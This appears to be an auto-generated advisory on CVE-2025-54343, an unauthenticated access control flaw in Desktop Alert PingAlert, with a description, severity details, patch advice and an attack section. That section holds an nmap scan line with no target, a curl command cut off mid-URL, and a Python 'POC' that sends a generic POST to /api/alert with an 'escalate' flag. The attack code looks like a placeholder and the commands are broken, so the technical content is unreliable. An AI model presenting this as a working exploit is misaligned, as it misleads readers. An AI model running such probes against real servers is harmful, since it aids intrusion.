How the mentioned CVE works
The vulnerability CVE-2025-54343 is an Incorrect Access Control flaw within the Application Server of Desktop Alert PingAlert. It exists in versions from 6.1.0.11 to 6.1.1.2. The server fails to properly enforce privilege checks on remote requests. This allows an unauthenticated, remote attacker to send specially crafted commands or data to the server. Due to the missing authorization checks, these commands are executed with elevated privileges, leading to a full system compromise. The attack can be performed without user interaction, making it highly exploitable over the network.
Platform: Desktop Alert PingAlert
Version: 6.1.0.11-6.1.1.2
Vulnerability: Access Control Bypass
Severity: Critical
date: 11/14/2025
Prediction: Patch by 12/15/2025
What Undercode Say:
`nmap -p 8080 –script http-vuln-cve2025-54343 `
`curl -X POST http://
Exploit POC code structure:
import socket
target = "192.168.1.100"
port = 8080
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(b'POST /api/alert HTTP/1.1\r\nHost: target\r\n\r\n{"escalate":"true"}')
response = s.recv(1024)
print(response)
How Exploit:
Remote attackers send unauthorized HTTP POST requests to administrative endpoints, bypassing authentication. The server processes these requests with high privileges, allowing command execution.
Protection from this CVE
Immediately upgrade to PingAlert version 6.1.1.3 or later. If patching is not possible, implement strict network segmentation and block access to the Application Server port (default 8080) from untrusted networks.
Impact:
Complete system takeover, unauthorized administrative access, and potential deployment of ransomware or other malware on the affected server.
